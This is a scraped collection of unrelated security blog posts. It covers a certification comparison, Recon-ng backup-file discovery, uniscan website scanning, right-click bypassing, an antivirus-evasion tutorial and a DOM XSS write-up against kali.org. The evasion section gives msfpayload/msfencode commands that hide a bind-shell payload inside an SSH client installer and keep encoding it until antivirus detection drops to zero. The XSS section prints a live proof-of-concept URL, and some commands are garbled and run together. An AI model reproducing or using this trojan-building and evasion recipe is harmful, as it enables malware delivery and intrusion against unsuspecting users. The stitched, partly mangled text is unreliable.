Why CPTE IS Better Than CEH?

In today’s information age, the security of data and technical assets from “Hackers” has become the top priority for every organization. For this purpose organizations hunt for people who can actually provide Information security to them. These guys (or girls in some cases) are generally referred to as “Security professionals”. We can imagine them as knights of the cyber space.

If we look a few decades back when cyber space just considered a myth, when most computers were noisy large mainframes and when the word “Hack” was just for train modelling (this was not a joke), back then there was no concept of cyber security. But after some nasty security breaches governments put their heads together upon this issue and Cyber security departments and organizations were formed to train such people.

Nowadays we see two certifications that are racing each other, one is CPTE (Certified Penetration testing engineer) from mile2 and the other is CEH (Certified Ethical Hacker) from EC-Council. But if we look at the fact I would say CPTE has lead in this one and this is not a hunch.
Some interesting facts that prove that CPTE is better than CEH

Facts

• If we analyze the course outline and the material of both courses it is clearly seen that in CEH candidate are only taught how to use the tools required for the job and are not provided with knowledge otherwise.

• While CPTE candidates are provided with in-depth knowledge so that they may be able counter security issues more efficiently. 

• CPTE has regular updates and modifications according to the fashion in security. While CEH is only updated entirely once in several years. 

• Now if we look at the other aspects CPTE also enhances the business skills needed to identify protection opportunities and optimize security controls according to the business needs while CEH we only focuses the technical side of Information security and that too up to the extent of teaching how to use tools.

• Now let us look at the economic factors that make CPTE better than CEH. The exam cost of CPTE is 250$ with no expiration of the course it means that if a course more advanced then CPTE is produced in the future then CPTE will remain as It is and the certifications of the candidates will whatsoever not be cancelled, Now the cost of CEH is 500$ with the possibility that the course will expire in 2 years when it is updated with a newer version and CEHv7 (CEH currently in action) will have to be re-done otherwise certifications will be cancelled. Now that might not sound like a good news to most of us who were thinking of doing CEH (because it is not a good news).

•  Last but not the least the CPTE course has been accredited by NSA itself as a National Information Assurance Training standard for system administrators while CEH has no accreditation. 

There you have it in-depth knowledge, more comprehensive training, accreditation by NSA what more could a person ask for in 250$. I know I am going for CPTE, wait….. I already am a CPTE. I don’t know about you guys.
Cheers

Recon-ng Framework A Quick Intro

Recon-ng is an open-source framework coded in python by Tim Tomes a.k.a LaNMaSteR53. Its interface is modeled after the look of the Metasploit Framework but it is not meant for exploitation or for spawning a meterpreter session or a shell, it is for web-based reconnaissance and information gathering. It comes with modules to support your web reconnaissance adventure and information gathering just like Metasploit's auxiliary and exploit modules. Modules are categorized into Discovery, Experimental, Recon and Reporting.
As of this writing here are the modules with its subcategories:

Discovery
---------
discovery/exploitable/http/dnn

_fcklinkgallery
discovery/exploitable/http/generic_restaurantmenu
discovery/exploitable/http/webwiz_rte
discovery/info_disclosure/dns/cache_snoop
discovery/info_disclosure/http/backup_finder
discovery/info_disclosure/http/google_ids
discovery/info_disclosure/http/interesting_files

Experimental
------------
experimental/rce

Recon
-----
recon/contacts/enum/http/web/dev_diver
recon/contacts/enum/http/web/namechk
recon/contacts/enum/http/web/pwnedlist
recon/contacts/enum/http/web/should_change_password
recon/contacts/gather/http/api/jigsaw/point_usage
recon/contacts/gather/http/api/jigsaw/purchase_contact
recon/contacts/gather/http/api/jigsaw/search_contacts
recon/contacts/gather/http/api/linkedin_auth
recon/contacts/gather/http/api/twitter
recon/contacts/gather/http/api/whois_pocs
recon/contacts/gather/http/web/jigsaw
recon/contacts/gather/http/web/pgp_search
recon/contacts/support/add_contact
recon/contacts/support/mangle
recon/creds/enum/http/api/leakdb
recon/creds/enum/http/api/noisette
recon/creds/gather/http/api/pwnedlist/account_creds
recon/creds/gather/http/api/pwnedlist/api_usage
recon/creds/gather/http/api/pwnedlist/domain_creds
recon/creds/gather/http/api/pwnedlist/domain_ispwned
recon/creds/gather/http/api/pwnedlist/leak_lookup
recon/creds/gather/http/api/pwnedlist/leaks_dump
recon/hosts/enum/dns/resolve
recon/hosts/enum/http/api/builtwith
recon/hosts/enum/http/api/punkspider
recon/hosts/enum/http/api/wascompanyhacked
recon/hosts/enum/http/api/whatweb
recon/hosts/enum/http/api/whois_lookup
recon/hosts/enum/http/web/age_analyzer
recon/hosts/enum/http/web/asafaweb
recon/hosts/enum/http/web/gender_analyzer
recon/hosts/enum/http/web/ipvoid
recon/hosts/enum/http/web/malwaredomain
recon/hosts/enum/http/web/mywot
recon/hosts/enum/http/web/netbios
recon/hosts/enum/http/web/netcraft_history
recon/hosts/enum/http/web/open_resolvers
recon/hosts/enum/http/web/urlvoid
recon/hosts/enum/http/web/web_archive
recon/hosts/enum/http/web/xssed
recon/hosts/gather/dns/brute_force
recon/hosts/gather/http/api/bing_ip
recon/hosts/gather/http/api/google_site
recon/hosts/gather/http/api/shodan_hostname
recon/hosts/gather/http/web/baidu_site
recon/hosts/gather/http/web/bing_site
recon/hosts/gather/http/web/census_2012
recon/hosts/gather/http/web/google_site
recon/hosts/gather/http/web/ip_neighbor
recon/hosts/gather/http/web/mcafee/mcafee_affil
recon/hosts/gather/http/web/mcafee/mcafee_dns
recon/hosts/gather/http/web/mcafee/mcafee_mail
recon/hosts/gather/http/web/netcraft
recon/hosts/gather/http/web/yahoo_site
recon/hosts/geo/http/api/hostip
recon/hosts/geo/http/api/ipinfodb
recon/hosts/geo/http/api/maxmind
recon/hosts/geo/http/api/uniapple
recon/hosts/geo/http/web/wigle
recon/hosts/support/add_host

Reporting
---------
reporting/csv_file
reporting/html_report
reporting/list

I am also one of the contributors for this framework and has contributed mostly to the Discovery modules.

In this article I'm going to emphasize the Backup File Finder module which I authored together with Tim Tomes (the main developer of Recon-ng). This module can be used for checking specific hosts for exposed backup files. The default configuration searches for wp-config.php files which contain WordPress database configuration information.

As a side note, this module is inspired by cmsploit.

Basic Usage:

load discovery/info_disclosure/http/backup_finder (use the module)

show options (shows the options that can be set for the module)

set source target.com (the host you want to crawl)

set uri config_file (configuration file you want to check, ex. wp-config.php)

Here is the screenshot of the Backup File Finder's actual crawling.

Now, here is what's inside in a typical configuration file:


define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'passwd');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

List of the various configuration files used by popular CMS' which can be set to the option uri:

wp-config.php >> WordPress
config.php >> phpBB, ExpressionEngine
configuration.php >> Joomla
LocalSettings.php >>MediaWiki
mt-config.cgi >> Movable Type
settings.php >> Drupal

About The Author

This article has been written by Jay Turla, he is a security researcher at Infosec, along with security research he also performs vulnerability research too.

Follow the simple steps to find the vulnerability in any website !

Now make sure you have opened Backtrack operating system and now just open the terminal and write the bellow code in the terminal and hit okay!

cd /pentest/web/uniscan && ./uniscan.pl

Now you can see the bellow snapshot there are few options are given. 

Now we have are going to use the bellow command and make sure you have the website link :)

./uniscan.pl -u http://www.website.com/ –bqdw

And your website’s URL should be end with the forward slash  and now just hit enter and then the process will start :) 

Now as you can see we got the IP address and the server of the website :) and wait we will get many more information :)

Directory Check: Directory check will check the directories of the website and it will list the directories of the website as shown in the bellow snapshot.
File check : Now as the name says it will check the files which are hosted in the website. 

Now crawler is started it will grab all the email address and externals hosts and all the information
 
Emails :

External Host:

Web backdoors:

File upload forums : 

Now let me tell you that using this tool we can scan the websites for many more vulnerability like sql-i, XSS, remote code execution and many more and you can make few bucks by participating in the bug bounty program :)

Check out: How i got 100$ from Google bugbounty program
 
Now you can see in the above snapshot the list of the bugs it will find :)
Check out: The list of the bug bounty program !

Now as shown in the above we the website is vulnerable to the blind sqli. :D Mission accomplished :) we have found the bug. if you have any question about this then make a comment :)

Now if you want to get the list of the sites hosted on the same server then simply add this command, just replace the ip address with the server’s ip address. and the list of the websites will be stored in the same directory with the name “sites.txt”

./uniscan.pl -i "ip:127.0.0.1"

and then if you want to scan the list of the website then simply run this command

./uniscan.pl -f sites.txt –bqwd

Now you have done ! :)  I hope you have enjoyed this tutorial :)

How to Bypass Right Click Block on Any Website

You might remember an experience where you tried to right-click on a web page but got a pop-up message saying that the “right-click functionality has been disabled”. Sometimes you may be trying to copy an image or view the source of a web page but when the right-click is disabled, these things would seem impossible. Bank websites and other sites that require a secure transaction such as a payment gateway are the ones to impose this kind of limited functionality on their pages. In this post, I will show you the ways by which you can easily bypass right-click block feature on any website.

In order to block the right-click activity, most websites make use of JavaScript which is one of the popular scripting languages used to enhance functionality, improve user experience and provide rich interactive features. In addition to this, it can also be used to strengthen the website’s security by adding some of the simple security features such as disabling right-click, protecting images, hiding or masking parts of a web page and so on.

How JavaScript Works?

Before you proceed to the next part which tells you how to disable the JavaScript functionality and bypass any of the restrictions imposed by it, it would be worthwhile for you to take up a minute to understand how JavaScript works.

JavaScript is a client side scripting language (in most cases), which means when loaded it runs from your own web browser. Most modern browsers including IE, Firefox, Chrome and others support JavaScript so that they can interpret the code and carry out actions that are defined in the script. In other words, it is your browser which is acting upon the instruction of JavaScript to carry out the defined actions such as blocking the right-click activity. So, disabling the JavaScript support on your browser can be a simple solution to bypass all the restrictions imposed by the website.

How to Disable the JavaScript?

Here is a step-by-step procedure to disable JavaScript on different browsers:

For Internet Explorer:

If you are using IE, just follow the steps below:

1. From the menu bar, go to Tools -> Internet Options.
2. In the “Internet Options” window, switch to Security tab and click on the button Custom level…

3. From the Security Settings, look for the option Active scripting and select the Disable radio button as shown above and click on “OK”.
4. You may even select the Prompt radio button, so that each time a page is loaded, you will have the option to either enable or disable the scripting.

For Google Chrome:

If you are using Chrome, you can disable the JavaScript by following the steps below:

1. Click on the Chrome “menu” button (on the top right corner) and select Tools.
2. From the “Settings” page, click on Show advanced settings…
3. Now under Privacy, click on the button Content settings…

4. Under the JavaScript, select the radio button which says “Do not allow any site to run JavaScript” and click on “Done”.

For Mozilla Firefox:

Steps to disable JavaScript on Firefox:

1. From the menu bar, click on Tools -> Options.
2. From the Options window, switch to Content tab, uncheck the option which says “Enable JavaScript” and click on “OK”.

How to Bypass the Right Click Block?

In order to bypass the right-click block or any other restriction imposed by JavaScript, all you need to do is just disable it in the browser and refresh the same page, so that it now reloads without JavaScript functionality. You are now free to right-click on the page, view its source or even copy any of the images that you may want to. Don’t forget to re-enable the JavaScript once again when your job is over. Otherwise lack of JavaScript support may result in unusual rendering of web pages.

How To Bypass Antivirus Detection - Making An Executable FUD

So in this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Thought their are lots of approaches, however our team member Malik Rafay has managed to find a way to make an executable FUD using msfencode.

Requirements 

A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!!

Attention !!!


We are using some harmless test files but don't infect people with any real viruses that's a Crime and we here at RHA are not responsible for

Purpose:

Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.

Creating a Listener:

This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won't spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands:  

cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe

You should see the listen.exe file as shown below:

Analyzing the Listener with VirusTotal

Go to https://www.virustotal.com/en/

Click the "Choose File" button. Navigate to /root and double-click the listen.exe"listen.exe" appears in the "Choose File" box, as shown below:

In the virustotal web page , Click the "scan it" button !!!

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Encoding the Listener

this process will encode the listener, & insert it into an innocent SSH file.

In BackTrack, in a Terminal window, execute these commands:

wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1ls -l evil*

You should see the evil-ssh.exe file as shown below :

Scan with virusTOTAL

Go to: https://www.virustotal.com/

If you see a "File already analyzed" message, click the "View last analysis" button.

The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.

 

Encode the Listener Again This process will encode the listener with several different encodings.

In BackTrack, in a Terminal window, execute these commands:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o

/root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1

msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*

You should see several files as shown below :

Analyzing Again

The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers.

Kali Linux DOM Based XSS Writeup

Recently, I have been on a mission to find XSS in popular security training websites, Since these are the ones who care about their security the most. I have been successful in finding in almost all of them i have tried up to date, This one was a bit interesting to i thought to write a post on it, Basically it was not a reflected/stored xss, however it was a DOM based XSS, similar to the one i found in Microsoft. Unlike others, this particular XSS occurs in client side javascript.

In order to provide features to the users lots of webmasters/Vendors are moving their code towards client side, the data is embedded in the DOM and before it's reflected back to the user it is not filtered out, which results in a DOM based XSS. The main cause of this vulnerabilities are dangerous Sinks. DOM based XSS wiki is a good source where you would find dangerous sources and sinks.

On checking out the source of kali.org, i immediately found out that i was running wordpress version 3.5.1, The version is the latest version of the wordpress and has no known public vulnerabilities till date, therefore i moved towards testing plugins.

I tested couple of plugins, however did not find any one of them vulnerable, by analyzing the source more deeply i found a pretty interesting plugin "WP-Pretty Photo" which caught my interest. Which is a jquery based lightbox for wordpress platform.

While, searching for common vulnerabilities for wp-prettyphoto plugin i found that it was vulnerable to DOM Based XSS. So, i quickly added my payload to the url and bamn it triggered an XSS.

POC:

http://www.kali.org/#!%22%3E%3Cimg%20src=1%20onerror=prompt%280%29;%3E//

Some debugging with chrome JS console, led me to the line 79 of the jquery.prettyPhoto.js, the line of code which was responsible for the cause of the DOM Based XSS.

http://www.kali.org/wp-content/themes/persuasion/lib/scripts/prettyphoto/js/jquery.prettyPhoto.js?ver=2.1

It was also obvious from the code that it required us ! sign to successfully execute the javascript.

The input inside the hashrel was not filtered out before it was being displayed to the user, which resulted in the DOM Based XSS.

The Fix

The following url discusses, about the fix:

https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc

If, this was not enough for you, then listen to this, Offensive-security team was very awesome in a sense, that they gave me a free voucher for their famous certification PWB 3.0.

 

I was really surprised to see that Dominator was not detecting it which is the only good tool for finding DOM Based XSS leaving IBM javascript scan apart, in past i have tried dominator against various websites suffering from DOM Based XSS and have found that, at some spots it's very good and at some spots it needs much improvement. Here is the screenshot:

I would like that every one would be act the same way i did and responsibly disclose every issue you find.

In this post, I am going to show you how to use your Gmail account to send and receive emails from multiple addresses. Most of us own more than one email account say for example, one from Gmail, one from Yahoo and one from Hotmail. If you are tired of logging into multiple accounts to check your inbox or send emails, I have a solution here.

Gmail has an option to integrate multiple email accounts (email addresses) into a single Gmail account. Once you integrate multiple email addresses into your Gmail account, you can use the same account to send and receive emails for different email addresses you have. Let’s take a simple example.

Suppose you have three email addresses (email accounts):

1. john@gmail.com
2. john@yahoo.com
3. john@hotmail.com

You can integrate the emails john@yahoo.com and john@hotmail.com to john@gmail.com and operate all the three accounts from your single gmail account. Here is a step-by-step procedure to do this:

1. Login to your gmail account.
2. Click on Settings at the top right corner.
3. Under Settings, click on the  Accounts tab.
4. Now you’ll see the first option “Send mail as:“
5. Under this option, click on Add another email address you own.
6. Now a small new window will pop-up asking you to enter the details of your new email address.
7. Here you can enter any name and any email address. The email address need not belong to gmail only. You can enter your yahoo, hotmail or any other valid email address.
8. A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.

Now, when you compose a new email, you’ll see an option to select from multiple address to send the mail. Also you’ll receive the incoming mails for multiple addresses to a single mailbox. I hope this will benefit you.

Before you leave, I should also tell you one good advantage of this. According to Gmail privacy policy, they will not send the user’s IP address in the outgoing emails. That means, when you send an email from your Gmail account , the receiver will not be able to find out your IP address. But you do not have this advantage in Yahoo or other email providers.

Please share your opinions through comments. I hope this helps….